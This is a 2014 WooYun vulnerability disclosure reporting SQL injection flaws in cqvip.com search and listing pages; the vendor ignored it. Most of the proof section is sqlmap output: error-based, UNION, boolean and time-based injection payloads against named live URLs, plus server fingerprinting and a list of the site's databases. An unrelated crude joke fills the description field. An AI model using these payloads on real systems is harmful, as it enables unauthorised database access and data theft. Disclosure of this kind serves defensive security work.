当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084709

漏洞标题:维普资讯几处SQL注射漏洞

相关厂商:cqvip.com

漏洞作者: 路人甲

提交时间:2014-11-26 10:57

修复时间:2014-12-01 10:58

公开时间:2014-12-01 10:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-26: 细节已通知厂商并且等待厂商处理中
2014-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

女生去菜市场买菜,看见一大妈在卖黄瓜就走过去买。
问完价后,大妈问你是买来吃的还是用的,你要是用的我就拿粗的给你。
当时她就震惊了,什么时候卖菜的大妈都变得这么开放了?
女生装作一脸纯洁地问她怎么用啊?
她说就是把黄瓜切片贴在脸上,你们城里人都爱。
妹纸你在想神马啊?

详细说明:

几处SQL注射,相同的库!?。。。。

漏洞证明:

1.http://sci.cqvip.com/Periodical/List.aspx?name=88952634&issn=88952634&sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc 
---这几个参数啊!!!
Place: GET
Parameter: name
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: name=88952634%' AND 9566=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (9566=9566) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113))) AND '%'='&issn=88952634&sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: name=88952634%' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+CHAR(90)+CHAR(113)+CHAR(87)+CHAR(109)+CHAR(98)+CHAR(68)+CHAR(84)+CHAR(65)+CHAR(110)+CHAR(85)+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113)-- &issn=88952634&sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc
Place: GET
Parameter: issn
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: name=88952634&issn=88952634%' AND 5256=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (5256=5256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113))) AND '%'='&sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: name=88952634&issn=88952634%' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+CHAR(110)+CHAR(71)+CHAR(84)+CHAR(74)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(81)+CHAR(66)+CHAR(74)+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113)-- &sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc
Place: GET
Parameter: sciences
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: name=88952634&issn=88952634&sciences=88952634%' AND 1318=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (1318=1318) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113))) AND '%'='&factor_max=88952634&factor_min=88952634&order=factor_desc
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: name=88952634&issn=88952634&sciences=88952634%' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+CHAR(72)+CHAR(119)+CHAR(81)+CHAR(78)+CHAR(110)+CHAR(76)+CHAR(86)+CHAR(116)+CHAR(97)+CHAR(90)+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113)-- &factor_max=88952634&factor_min=88952634&order=factor_desc
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] master
[*] model
[*] msdb
[*] SupportCenter
[*] tempdb
2.http://train.cqvip.com/search.asp?province=%CA%A1%EF%BF%BD%EF%BF%BD&city=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&trade=%EF%BF%BD%EF%BF%BD%EF%BF%BD&submit=%EF%BF%BD%EF%BF%BD%D1%B5%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&pid=88952634&cid=88952634&iid=88952634&tid=8895263
Place: GET
Parameter: iid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=18&iid=3) AND 6455=6455 AND (4400=4400
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: pid=18&iid=-2337) OR 6980=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (2267=2267
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008

修复方案:

可不可以送辣条吃!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-01 10:58

厂商回复:

最新状态:

暂无


漏洞评价:

评论